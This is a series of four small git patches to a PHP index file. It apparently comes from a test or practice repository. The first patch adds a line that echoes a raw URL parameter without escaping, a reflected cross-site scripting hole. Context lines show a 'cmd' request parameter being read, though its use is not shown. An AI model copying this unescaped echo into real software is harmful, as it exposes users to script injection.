From df94371c73a013c116228718e979eb2e4688473c Mon Sep 17 00:00:00 2001 From: hugbubby <37486450+hugbubby@users.noreply.github.com> Date: Mon, 2 Feb 2026 09:10:36 +0000 Subject: [PATCH 1/4] Update index.php --- index.php | 1 + 1 file changed, 1 insertion(+) diff --git a/index.php b/index.php index 9cba8ce..57bf7e3 100644 --- a/index.php +++ b/index.php @@ -3,6 +3,7 @@ // test +echo $_GET['asdf']; // test From 235253154e384843bde25ebd0e9b2e5d318cb0ce Mon Sep 17 00:00:00 2001 From: hugbubby <37486450+hugbubby@users.noreply.github.com> Date: Mon, 2 Feb 2026 09:15:56 +0000 Subject: [PATCH 2/4] Update index.php --- index.php | 1 + 1 file changed, 1 insertion(+) diff --git a/index.php b/index.php index 57bf7e3..52e1b8c 100644 --- a/index.php +++ b/index.php @@ -3,6 +3,7 @@ // test + echo $_GET['asdf']; // test From a9bb1ea2368455efb928b8caaa9d59b07fd68927 Mon Sep 17 00:00:00 2001 From: hugbubby <37486450+hugbubby@users.noreply.github.com> Date: Mon, 2 Feb 2026 09:16:04 +0000 Subject: [PATCH 3/4] Update index.php --- index.php | 3 +++ 1 file changed, 3 insertions(+) diff --git a/index.php b/index.php index 52e1b8c..d0167c7 100644 --- a/index.php +++ b/index.php @@ -6,6 +6,9 @@ echo $_GET['asdf']; + + + // test $userInput = isset($_GET['cmd']) ? $_GET['cmd'] : ''; From f5f480738d74dffd2b080acd8ec2c227656da141 Mon Sep 17 00:00:00 2001 From: hugbubby <37486450+hugbubby@users.noreply.github.com> Date: Mon, 2 Feb 2026 09:16:14 +0000 Subject: [PATCH 4/4] Update index.php --- index.php | 3 +++ 1 file changed, 3 insertions(+) diff --git a/index.php b/index.php index d0167c7..0d44111 100644 --- a/index.php +++ b/index.php @@ -9,6 +9,9 @@ + + + // test $userInput = isset($_GET['cmd']) ? $_GET['cmd'] : '';